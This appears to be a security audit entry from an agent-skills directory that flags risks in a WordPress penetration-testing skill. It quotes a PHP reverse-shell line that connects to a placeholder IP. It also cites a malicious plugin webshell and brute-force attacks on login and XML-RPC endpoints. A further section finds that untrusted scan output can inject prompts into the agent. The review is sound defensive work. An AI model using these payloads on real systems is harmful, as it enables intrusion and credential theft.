The Agent Skills Directory

[COMMAND_EXECUTION]: The skill provides numerous pre-configured command-line strings for tools such as wpscan, nmap, and curl to interact with remote targets.
Evidence: Commands in Phases 1-8 use wpscan and nmap with aggressive detection flags.
Evidence: Use of bash loops for author ID enumeration targeting remote URLs.
[REMOTE_CODE_EXECUTION]: The skill provides explicit source code for malicious payloads intended to be executed on a remote server to gain access.
Evidence: PHP reverse shell payload provided in Phase 9: exec("/bin/bash -c 'bash -i >& /dev/tcp/YOUR_IP/4444 0>&1'");.
Evidence: Instructions to create and upload a 'Malicious Plugin' (malicious.php) containing a system command execution webshell.
[DATA_EXFILTRATION]: The skill includes instructions to identify and extract sensitive files and user data from a target system.
Evidence: Commands specifically designed to locate configuration backups (cb) and database exports (dbe) via wpscan.
Evidence: Automated extraction of user lists via WordPress REST API and XML-RPC endpoints.
[CREDENTIALS_UNSAFE]: The skill details methods for conducting automated password attacks and generating wordlists.
Evidence: Brute-forcing commands using common wordlists like rockyou.txt against wp-login and xmlrpc endpoints.
Evidence: Instructions for using cewl to scrape site content into a custom wordlist for targeted attacks.
[PROMPT_INJECTION]: The skill exhibits an attack surface for indirect prompt injection through the processing of untrusted web content.
Ingestion points: Data enters the context via curl, wget, and wpscan outputs from external websites.
Boundary markers: Absent; there are no instructions to ignore or treat scan results as untrusted data.
Capability inventory: The skill has extensive command execution, file-write, and network operation capabilities across multiple phases.
Sanitization: Absent; external content is interpolated directly into reports or used to drive subsequent attack phases.

WordPress Penetration Testing